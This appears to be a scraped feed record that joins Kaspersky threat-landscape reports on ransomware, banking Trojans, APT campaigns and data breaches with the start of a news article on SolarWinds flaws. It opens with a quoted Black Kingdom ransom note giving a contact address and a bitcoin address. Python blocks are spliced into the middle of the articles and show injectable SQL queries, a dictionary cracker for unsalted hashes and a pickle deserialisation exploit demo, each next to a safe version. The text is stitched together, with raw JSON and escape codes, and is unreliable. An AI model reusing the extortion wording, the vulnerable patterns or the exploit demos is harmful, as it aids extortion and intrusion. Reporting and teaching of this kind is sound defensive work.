We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.

To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )

***************************
| What guarantees ?
***************************

We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free
just send the files you want to decrypt to (support_blackkingdom2@protonmail.com

***************************************************
| How to contact us and recover all of your files ?
***************************************************

The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .


[ + ] Instructions:

1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com

2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :

[ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]

3- confirm your payment by sending the transfer url to our email address

4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,
so that you can recover all your files.

## Note ##

Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.
By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.

Your ID ==>
FDHJ91CUSzXTquLpqAnP
```

After decompiling the Python code, we discovered that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on GitHub](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>). The group adapted parts of the code, adding features that were not originally present in the builder, such as the hardcoded key.
We were not able to attribute Black Kingdom to any known threat group.

Based on our telemetry, we could see only a few hits by Black Kingdom, in Italy and Japan.

### Gootkit: the cautious banking Trojan

[Gootkit](<https://securelist.com/gootkit-the-cautious-trojan/102731/>) belongs to a class of Trojans that are extremely tenacious, but not widespread. Since it's not very common, new versions of the Trojan may remain under researchers' radar for long periods.

It is complex, multi-stage banking malware, which was initially discovered by Doctor Web in 2014. Initially, it was distributed via spam and exploit kits such as Spelevo and RIG. Alongside spam campaigns, the adversaries later switched to compromised websites where visitors are tricked into downloading the malware.

Gootkit is capable of stealing data from the browser, performing man-in-the-browser attacks, keylogging, taking screenshots, and many other malicious actions. The Trojan's loader performs various virtual machine and sandbox checks and uses sophisticated persistence algorithms.

In 2019, Gootkit stopped operating after it experienced a [data leak](<https://www.zdnet.com/article/gootkit-malware-crew-left-their-database-exposed-online-without-a-password/>), but has been [active again](<https://www.bleepingcomputer.com/news/security/gootkit-malware-returns-to-life-alongside-revil-ransomware/>) since November 2020. Most of the victims are located in EU countries such as Germany and Italy.

### Bizarro banking Trojan expands into Europe

Bizarro is one more banking Trojan family originating from Brazil that is now found in other parts of the world. We have seen people being targeted in Spain, Portugal, France and Italy.
This malware has been used to steal credentials from customers of 70 banks in different European and South American countries.

As with [Tetrade](<https://securelist.com/the-tetrade-brazilian-banking-malware/97779/>), Bizarro uses affiliates or recruits money mules to cash out or simply to help with money transfers.

Bizarro is distributed via MSI packages downloaded by victims from links in spam emails. Once launched, it downloads a ZIP archive from a compromised website. We observed hacked WordPress, Amazon and Azure servers used by the Trojan for storing archives. The backdoor, which is the core component of Bizarro, contains more than 100 commands and allows the attackers to steal online banking account credentials. Most of the commands are used to display fake pop-up messages that seek to trick people into entering two-factor authentication codes. The Trojan may also use social engineering to convince victims to download a smartphone app.

Bizarro is one of several banking Trojans from South America that have extended their operations into other regions – mainly Europe. They include Guildma, Javali, Melcoz, Grandoreiro and Amavaldo.

### Malicious code in APKPure app

In early April, we [discovered malicious code in version 3.17.18 of the official client of the APKPure app store](<https://securelist.com/apkpure-android-app-store-infected/101845/>), a popular alternative source of Android apps.
[The incident seems to be similar to what happened with CamScanner](<https://www.kaspersky.com/blog/camscanner-malicious-android-app/28156/>), when the app's developer implemented an adware SDK from an unverified source.

When launched, the embedded Trojan dropper, which our solutions detect as HEUR:Trojan-Dropper.AndroidOS.Triada.ap, unpacks and runs its payload, which is able to show ads on the lock screen, open browser tabs, collect information about the device, and download other malicious code. The Trojan downloaded depends on the version of Android and how recently security updates have been installed. On relatively recent versions of the operating system (Android 8 or higher) it loads additional modules for the [Triada Trojan](<https://www.kaspersky.com/blog/triada-trojan/11481/>). If the device is older (Android 6 or 7, and without security updates installed) it could be the [xHelper Trojan](<https://securelist.com/unkillable-xhelper-and-a-trojan-matryoshka/96487/>).

We reported the issue to APKPure on April 8. APKPure acknowledged the problem the following day and, soon afterwards, posted a new version (3.17.19) that does not contain the malicious component.

### Browser lockers

Browser lockers are designed to prevent the victim from using their browser unless they pay a ransom. The "locking" consists of preventing the victim from leaving the current tab, which displays intimidating messages, often with sound and visual effects. The locker tries to trick the victim into making a payment with threats of losing data or legal liability.

This type of fraud has long been on the radar of researchers, and over the last decade there have been numerous browser locking campaigns targeting people worldwide.
The tricks used by the scammers include imitating the infamous "[Blue Screen of Death](<https://encyclopedia.kaspersky.com/glossary/blue-screen-of-death-bsod/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>)" (BSOD) in the browser, false warnings about system errors or detected malware, threats to encrypt files and legal liability notices.

In our [report on browser lockers](<https://securelist.com/browser-lockers-extortion-disguised-as-a-fine/101735/>), we examined two families of lockers that mimic government websites.

Both families spread mainly via advertising networks, primarily those aimed at selling "adult" content and movies in an intrusive manner; for example, through tabs or windows that open on top of the visited site when loading a page with an embedded ad module (pop-ups), or after clicking anywhere on the page (click-unders).

These threats are not technically complex: they simply aim to create the illusion of having locked the computer and intimidate victims into paying money. Landing on such a page by mistake will not harm your device or compromise your data, as long as you don't fall for the cybercriminals' smoke-and-mirrors tactics.

### Malware targets Apple M1 chip

Last November, Apple unveiled its M1 chip. The new chip, which has replaced Intel processors in several of its products, is based on the ARM architecture instead of the x86 architecture traditionally used in personal computers. This lays the foundation for Apple to switch completely to its own processors and unify its software under a single architecture.
Unfortunately, just months after the release, [malware writers had already adapted several malware families to the new processor](<https://securelist.com/malware-for-the-new-apple-silicon-platform/101137/>).

### Attempted supply-chain attack using PHP

In March, [unknown attackers tried to carry out a supply-chain attack by introducing malicious code into the PHP scripting language](<https://www.kaspersky.com/blog/php-git-backdor/39191/>). The developers of PHP make changes to the code using a common repository built on the Git version control system. The attackers tried to add a backdoor to the code. Fortunately, a developer noticed something suspicious during a routine check. Had they not done so, the backdoor might have allowed attackers to run malicious code remotely on web servers, around 80 per cent of which use PHP.

_IT threat evolution Q2 2021, published 2021-08-12: <https://securelist.com/it-threat-evolution-q2-2021/103597/>_

## Targeted attacks and malware campaigns

### Mobile espionage targeting the Middle East

At the end of June, we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker', involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017. The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built a version of the legitimate open-source 'Conversations' messenger that included the malicious code. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).

### APT33 beefs up its toolset

In July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor has relied heavily on the Browser Exploitation Framework (BeEF).
However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure. Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.

### New FinSpy iOS and Android implants found in the wild

We recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities.
The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices – suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.

### Turla revamps its toolset

Turla (aka Venomous Bear, Uroboros and Waterbug), a high-profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset. Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded in the computer's registry for the malware to access when ready. The two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak.
All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).

### CloudAtlas uses new infection chain

[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported on this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts. Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates – whitelisted per victim – hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.

### Dtrack banking malware discovered

In summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware, and we found more than 180 new malware samples of a spy tool that we now call Dtrack.
All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers – we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India. Our telemetry indicates that the latest Dtrack activity was detected at the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).

## Other security news

### Sodin ransomware attacks MSPs

In April, the Sodin ransomware (aka Sodinokibi and REvil) caught our attention, not least because of the way it spread. The Trojan [exploited the CVE-2019-2725 vulnerability](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>) to execute a PowerShell command on a vulnerable Oracle WebLogic server, allowing the attackers to upload a dropper to the server, which then installed the ransomware payload. Patches for this vulnerability were released in April, but at the end of June, a similar vulnerability was discovered – CVE-2019-2729.
Sodin also carried out [attacks on MSPs](<https://www.darkreading.com/attacks-breaches/attackers-exploit-msps-tools-to-distribute-ransomware/d/d-id/1335025>). In some cases, the attackers used the Webroot and Kaseya remote access consoles to deliver the Trojan. In others, [the attackers penetrated MSP infrastructure using an RDP connection](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), elevated privileges, deactivated security solutions and backups, and then downloaded the ransomware to client computers. This ransomware was also unusual because it didn't require the victim to carry out any action. Our statistics indicated that most victims were located in the Asia-Pacific region, including Taiwan, Hong Kong and South Korea.

Ransomware continues to be a major headache for consumers and businesses alike. Recovering data that a ransomware Trojan has encrypted is often impossible. However, in some cases we are able to do so. Recent examples include the [Yatron and FortuneCrypt malware](<https://securelist.com/ransomware-two-pieces-of-good-news/93355/>). If you ever face a situation where a ransomware Trojan has encrypted your data, and you don't have a backup, it's always worth checking the [No More Ransom](<https://www.nomoreransom.org/>) site to see if a decryptor is available. You can find our decryptors for both of the above ransomware programs [here](<https://support.kaspersky.com/viruses/disinfection/10556>) and [here](<https://www.nomoreransom.org/en/decryption-tools.html>).

### The impact of web mining

[Malicious miners](<https://securelist.com/kaspersky-security-bulletin-2018-story-of-the-year-miners/89096/>) are programs designed to hijack the victim's CPU in order to mine crypto-currencies.
The business model is simple: infect the computer, use the processing power of their [CPU](<https://en.wikipedia.org/wiki/Central_processing_unit>) or [GPU](<https://en.wikipedia.org/wiki/Graphics_processing_unit>) to generate coins and earn real-world money through legal exchanges and transactions. It's not obvious to the victim that they are infected \u2013 most people seldom use most of their computer's processing power and miners harness the 70-80% that is not being used for anything else. Miners can be installed along with adware, hacked games and other pirated content. However, there's also another model \u2013 using an embedded mining script that starts when the victim opens an infected web page. Where a corporate network has been infected, the CPU capacity available to the cybercriminals can be huge. But what impact does mining have? We recently tried to quantify the economic and environmental impact of web miners; and thereby evaluate the positive benefit of protecting against mining.\n\nThe total power saving can be calculated using the formula \u00b7N, where is the average value of the increase in power consumption of the victim's device during the web mining process, and N is the number of blocked attempts according to KSN ([Kaspersky Security Network](<https://www.kaspersky.com/ksn>)) data for 2018. This figure is equal to 18.8\u00b111.8 gigawatts (GW) \u2013 twice the average power consumption rate of all Bitcoin miners in the same year. To assess the amount of saved energy based on this power consumption rate, this number is multiplied by the average time that victim devices spend on web mining; that is, according to the formula '\u00b7N\u00b7t', where 't' is the average time that web miners would have been working had they not been blocked by our products. 
Since this value cannot be obtained from Kaspersky data, we used information from open sources provided by third-party researchers, according to which the estimated amount of electricity saved by users of our products ranges from 240 to 1,670 megawatt hours (MWh). Using the average prices for individual consumers, this amount of electricity could cost up to $200,000 for residents in North America or up to \u20ac250,000 for residents in Europe.\n\nYou can read our report [here](<https://securelist.com/electricity-and-mining/93292/>).\n\n### Mac OS threat landscape\n\nSome people still believe that there are no serious threats for Mac OS. There are certainly fewer threats than for Windows, mainly because more people run Windows, so there is a bigger pool of potential victims for attackers to target. However, as the number of people running Mac OS has grown, so have the number of threats targeting them.\n\nOur database currently contains 206,759 unique malicious and potentially unwanted files for Mac OS. From 2012 to 2017, the number of people facing attack grew year by year, reaching a peak in 2017, when we blocked attacks on around 255,000 computers running Mac OS. Since then, there has been a drop; and in the first half of 2019, we blocked around 87,000 attacks. The majority of threats for Mac OS in 2019 fell into the adware category \u2013 these threats are easier to create, offering a better return on investment for cybercriminals.\n\nThe number of phishing attacks targeting Mac OS has also increased year by year. During the first half of 2019, we detected nearly 6 million phishing attacks, 11.8% of which targeted corporate users. The countries facing the most phishing attacks were Brazil (30.87%), India (22.08%) and France (22.02%). The number of phishing attacks seeking to exploit the Apple brand name has also grown in recent years \u2013 by around 30-40% each year. 
In 2018, there were nearly 1.5 million such attacks; and in the first half of 2019 alone, the number exceeded 1.6 million \u2013 already an increase of 9% over the previous year.\n\nYou can read our report on the current Mac OS threat landscape [here](<https://securelist.com/threats-to-macos-users/93116/>).\n\n### Smart home vulnerabilities\n\nOne of our colleagues chose to turn his home into a smart home and installed a Fibaro Home Center system, so that he could remotely manage smart devices in the house, including lights, heating system, fridge, stereo system, sauna heater, smoke detectors, flood sensors, IP cameras and doorbell. He invited researchers from the [Kaspersky ICS CERT](<https://ics-cert.kaspersky.com/>) team to investigate it to see how secure it was. The researchers knew the model of the smart home hub and the IP address. They decided not to look at the Z-Wave protocol, which the smart home hub uses to talk to the appliances, because this required physical proximity to the house. They also discarded the idea of exploiting the programming language interpreter \u2013 the Fibaro hub used the patched version.\n\nOur researchers were able to find a remote SQL injection vulnerability, despite the efforts of Fibaro to avoid them, and a couple of remote code execution vulnerabilities in the PHP code. If exploited, these vulnerabilities would allow attackers to get root access rights on the smart hub, giving them full control over it. They also found a severe vulnerability in the Fibaro cloud that could allow an attacker to access all backups uploaded from Fibaro hubs around the world. This is how our research team acquired the backup data stored by the Fibaro Home Center located in this particular home. 
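The Fibaro write-up above names the bug classes (a remote SQL injection that survived the vendor's own filtering, plus remote code execution in the PHP code) but, deliberately, gives no query or code. The following is an added example, not Fibaro's or Kaspersky's code, that assumes a hypothetical `users` table and shows in Python with SQLite why a string-built query is injectable, why a quote-stripping filter does not save an unquoted numeric field, and what the parameterised fix looks like:

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Hypothetical hub user table, built in memory for the example."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (name TEXT, password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", "h_admin", 1), ("guest", "h_guest", 0)],
    )
    conn.commit()
    return conn


def strip_quotes(value: str) -> str:
    """A common home-grown 'anti-injection' filter: drop single quotes.
    It stops the textbook ' OR '1'='1 only inside a quoted string context."""
    return value.replace("'", "")


def lookup_by_name_vulnerable(conn, name: str) -> list:
    """Query assembled with string formatting: the input is parsed as SQL."""
    sql = "SELECT name, is_admin FROM users WHERE name = '%s'" % name
    return conn.execute(sql).fetchall()


def lookup_by_id_filtered(conn, user_id: str) -> list:
    """Still vulnerable: the filter does nothing for an unquoted numeric
    field, so `1 OR 1=1` or a UNION goes straight through."""
    sql = "SELECT name, is_admin FROM users WHERE rowid = %s" % strip_quotes(user_id)
    return conn.execute(sql).fetchall()


def lookup_by_name_safe(conn, name: str) -> list:
    """Parameterised query: the driver binds `name` as data, never as SQL."""
    return conn.execute(
        "SELECT name, is_admin FROM users WHERE name = ?", (name,)
    ).fetchall()


def lookup_by_id_safe(conn, user_id: str) -> list:
    """Validate the type first, then bind; '1 OR 1=1' fails at int()."""
    return conn.execute(
        "SELECT name, is_admin FROM users WHERE rowid = ?", (int(user_id),)
    ).fetchall()
```

The UNION variant is the one that matters for a device like this: it turns a harmless name lookup into a dump of every stored credential, which is the kind of data the researchers later found in the hub's backup.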
Among other things, this backup contains a database file with a lot of personal information, including the house's location, geo-location data from the owner's smartphone, the email address used to register with Fibaro, information about smart devices in the owner's home and even the owner's password. Credit to Fibaro Group not only for creating a rather secure product but also for working closely with our researchers to quickly patch the vulnerabilities we reported to them. You can read the full story [here](<https://securelist.com/fibaro-smart-home/91416/>).\n\n### Security of smart buildings\n\nThis quarter we also looked at the [security of automation systems in buildings](<https://securelist.com/smart-buildings-threats/93322/>) \u2013 sensors and controllers to manage elevators, ventilation, heating, lighting, electricity, water supply, video surveillance, alarm systems, fire extinguishing systems and more in industrial facilities. Such systems are used not only in office and residential buildings but also in hospitals, shopping malls, prisons, industrial production, public transport and other places where large work and/or living areas need to be controlled. We looked at the live threats to building-based automation systems to see what malware their owners encountered in the first six months of 2019.\n\nMost of the blocked threats were neither targeted, nor specific to building-based automation systems, but ordinary malware regularly found on corporate networks unrelated to automation systems. Such threats can still have a significant impact on the availability and integrity of automation systems, from file encryption (including databases) to denial of service on network equipment and workstations because of malicious traffic and unstable exploits. 
Spyware and backdoors pose a far greater threat, since stolen authentication data and the remote control it provides can be used to plan and carry out a subsequent targeted attack on a building's automation system.\n\n### Smart cars and connected devices\n\nKaspersky has investigated smart car security several times in recent years ([here](<https://securelist.com/mobile-apps-and-stealing-a-connected-car/77576/>) and [here](<https://securelist.com/a-study-of-car-sharing-apps/86948/>)), revealing a number of security issues. As vehicles become smarter and more connected they are also becoming more exposed. However, this doesn't just apply to smart cars and the apps that support them. There is now a whole industry of after-market devices designed to improve the driving experience \u2013 from car scanners to tuning gadgets. In a recent report, [we reviewed a number of automotive connected devices](<https://securelist.com/on-the-iot-road/91833/>) and reviewed their security setup. This exercise provided us with a first look at security issues in these devices. Our review included a couple of auto scanners, a dashboard camera, a GPS tracker, a smart alarm system and a pressure and temperature monitoring system.\n\nWe found the security of these devices more or less adequate, leaving aside minor issues. This is partly due to the limited device functionality and a lack of serious consequences in the event of a successful attack. It's also due to the vigilance of vendors. 
However, as we move towards a more and more connected future, it's important to remember that the smarter an object is the more attention should be paid to security in the development and updating of a device: careless development or an unpatched vulnerability could allow an attacker to hijack a victim's car or spy on an entire car fleet.\n\nWe continue to develop [KasperskyOS](<https://os.kaspersky.com/2019/05/20/kasperskyos-an-immune-based-approach-to-information-system-security/>), to help customers secure connected systems \u2013 including mobile devices and PCs, internet of things devices, intelligent energy systems, industrial systems, telecommunications systems and transportation systems.\n\nIf you're considering buying a device to make your car a little bit smarter, you should think about the security risks. Check to see if any vulnerabilities affect the device and whether it's possible to apply security updates to it. Don't automatically buy the most recently released product, since it might contain a security flaw that hasn't yet been discovered: the best choice is to buy a product that has already been updated several times. Finally, always consider the security of the 'mobile dimension' of the device, especially if you use an Android device: while applications make life easier, once a smartphone is hit by malware a lot can go wrong.\n\n### Personal data theft\n\nWe've become used to a steady stream of reports in the news about data breaches. Recent examples include the [theft of 23,205,290 email addresses](<https://www.forbes.com/sites/daveywinder/2019/08/05/cafepress-hacked-23m-accounts-compromised-is-yours-one-of-them/#625d70cf407e>) together with passwords weakly stored as base64 SHA-1 encoded hashes from CafePress. 
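The scheme attributed to CafePress above, an unsalted SHA-1 digest stored base64-encoded, is why a leaked table of such hashes is nearly a leaked table of passwords: the same password always yields the same string, so one pass over a wordlist recovers every account that used a common password. The following is an added example, not code from CafePress or from the report, contrasting that scheme with salted scrypt from Python's hashlib; the leaked list and wordlist are constructed for the example:

```python
import base64
import hashlib
import hmac
import os


def unsalted_sha1_b64(password: str) -> str:
    """The weak scheme: base64(sha1(password)), no salt, no work factor."""
    return base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def crack_unsalted(leaked_hashes: list, wordlist: list) -> dict:
    """One hash per candidate word breaks every account sharing that word.
    Returns {leaked_hash: recovered_password}."""
    table = {unsalted_sha1_b64(word): word for word in wordlist}
    return {h: table[h] for h in leaked_hashes if h in table}


def scrypt_hash(password: str, salt: bytes = b"") -> str:
    """Salted, memory-hard hash; the per-user salt defeats the shared table.
    Stored form: scrypt$<salt b64>$<derived key b64>."""
    salt = salt or os.urandom(16)
    dk = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)
    return "scrypt$%s$%s" % (
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def scrypt_verify(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    scheme, salt_b64, dk_b64 = stored.split("$")
    if scheme != "scrypt":
        return False
    salt = base64.b64decode(salt_b64)
    dk = hashlib.scrypt(password.encode(), salt=salt, n=2 ** 14, r=8, p=1, dklen=32)
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))
```

With the unsalted scheme the attacker's cost is one SHA-1 per wordlist entry for the whole breach; with a per-user salt it is one scrypt evaluation per entry per user, and each evaluation is deliberately slow and memory-hungry.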
Worryingly, the hack was reported by [Have I Been Pwned](<https://haveibeenpwned.com>) \u2013 CafePress didn't notify its customers until some months after the breach had occurred.\n\nIn August, two Israeli [researchers discovered fingerprints, facial recognition data and other personal information from the Suprema Biostar 2 biometric access control system in a publicly accessible database](<https://www.theguardian.com/technology/2019/aug/14/major-breach-found-in-biometrics-system-used-by-banks-uk-police-and-defence-firms>). The exposure of biometric data is of particular concern. If a hacker is able to obtain my password, I can change it, but a biometric is for life.\n\n[Facebook has faced criticism on several occasions for failing to handle customers' data properly](<https://www.kaspersky.com/blog/facebook-10-fails/26980/>). In the latest of a long list of incidents, hundreds of millions of [phone numbers linked to Facebook accounts were found online](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/?guccounter=1>) on a server that wasn't protected with a password. Each record contained a unique Facebook ID and the phone number listed on the account, leaving affected Facebook customers open to spam calls and SIM-swap attacks.\n\nOn September 12, mobile gaming company [Zynga reported that some player account data may have been accessed illegally by 'outside hackers'](<https://www.scmagazine.com/home/security-news/the-word-is-out-zynga-was-breached/>). Subsequently, a hacker going by the name of Gnosticplayers claimed to have breached the player database of _Words With Friends_, as well as data from _Draw Something_ and the discontinued game _OMGPOP_, exposing the data of more than 200 million Android and iOS players. While Zynga spotted the breach and notified customers, it's worrying that passwords were stored in cleartext.\n\nConsumers have no direct control over the security of the personal data they disclose to online providers. 
However, we can limit the damage of a security breach at an online provider by ensuring that the passwords we use with each provider are unique and hard to guess, or by using a password manager to do this for us. By making use of two-factor authentication, where offered by an online provider, we can further reduce the impact of any breach.\n\nIt's also worth bearing in mind that hacking the server of an online provider isn't the only way that cybercriminals can get their hands on passwords and other personal data. They also harvest data stored on a consumer's computer directly. This includes data stored in browsers, files from the hard disk, system data, account logins and more. Our data shows that 940,000 people were targeted by malware designed to steal such data in the first half of 2019. We would recommend using specialist software to store account passwords and bank card details, rather than relying on your browser. You can find out more about how cybercriminals target personal data on computers [here](<https://securelist.com/how-to-steal-a-million-of-your-data/91855/>).", "cvss3": {}, "published": "2019-11-29T10:00:12", "type": "securelist", "title": "IT threat evolution Q3 2019", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2019-2725", "CVE-2019-2729"], "modified": "2019-11-29T10:00:12", "id": "SECURELIST:967D8B65D5D554FFB5B46411F654A78A", "href": "https://securelist.com/it-threat-evolution-q3-2019/95268/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:39:09", "description": "Cybersecurity researchers on Wednesday disclosed three severe security vulnerabilities impacting SolarWinds products, the most severe of which could have been exploited to achieve remote code execution with elevated privileges.\n\nTwo of the flaws (CVE-2021-25274 
and CVE-2021-25275) were identified in the SolarWinds Orion Platform, while a third separate weakness (CVE-2021-25276) was found in the company's Serv-U FTP server for Windows, [said](<https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/full-system-control-with-new-solarwinds-orion-based-and-serv-u-ftp-vulnerabilities/>) cybersecurity firm Trustwave in a technical analysis.\n\nNone of the three vulnerabilities are believed to have been exploited in any \"in the wild\" attacks or during the unprecedented [supply chain attack](<https://thehackernews.com/2021/01/heres-how-solarwinds-hackers-stayed.html>) targeting the Orion Platform that came to light last December.\n\nThe two sets of vulnerabilities in Orion and Serv-U FTP were disclosed to SolarWinds on December 30, 2020, and January 4, 2021, respectively, following which the company resolved the issues on January 22 and January 25.\n\nIt's highly recommended that users install the latest versions of [Orion Platform](<https://documentation.solarwinds.com/en/Success_Center/orionplatform/content/release_notes/orion_platform_2020-2-4_release_notes.htm>) and Serv-U FTP ([15.2.2 Hotfix 1](<https://downloads.solarwinds.com/solarwinds/Release/HotFix/Serv-U-15.2.2-Hotfix-1.zip>)) to mitigate the risks associated with the flaws. 
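The most severe of the Orion issues, as Trustwave describes it further down, is a message queue that anyone can write to, feeding a consumer that deserialises whatever arrives; the vendor's fix was to validate a signature on each message before it is processed. The following is an added example in Python, not SolarWinds' or Trustwave's code: pickle stands in for the .NET deserialiser, a shared-key HMAC stands in for the digital signature (the key is a hypothetical assumption), and a harmless module-level function records that attacker-chosen code ran during deserialisation where a real payload would call the operating system.

```python
import hashlib
import hmac
import json
import pickle

EXECUTED = []  # records the side effect of the malicious payload
KEY = b"hypothetical-collector-signing-key"  # assumption: shared by producer and consumer
TAG_LEN = hashlib.sha256().digest_size


def _attacker_callable(marker: str) -> str:
    """Invoked by the deserialiser; a real payload would run a command here."""
    EXECUTED.append(marker)
    return marker


class MaliciousMessage:
    """Object whose __reduce__ tells the deserialiser which callable to invoke."""

    def __reduce__(self):
        return (_attacker_callable, ("attacker-controlled code ran",))


def attacker_message() -> bytes:
    """What anyone able to reach the unauthenticated queue could drop into it."""
    return pickle.dumps(MaliciousMessage())


def process_unsafe(raw: bytes):
    """Vulnerable consumer: deserialises whatever arrived on the queue."""
    return pickle.loads(raw)


def sign_message(body: bytes) -> bytes:
    """Legitimate producer: tag || body, tag = HMAC-SHA256 over the body."""
    return hmac.new(KEY, body, hashlib.sha256).digest() + body


def process_signed(raw: bytes):
    """Fixed consumer: verify the tag first, then parse a data-only format."""
    tag, body = raw[:TAG_LEN], raw[TAG_LEN:]
    expected = hmac.new(KEY, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # unsigned or forged: dropped before any deserialisation
    return json.loads(body)
```

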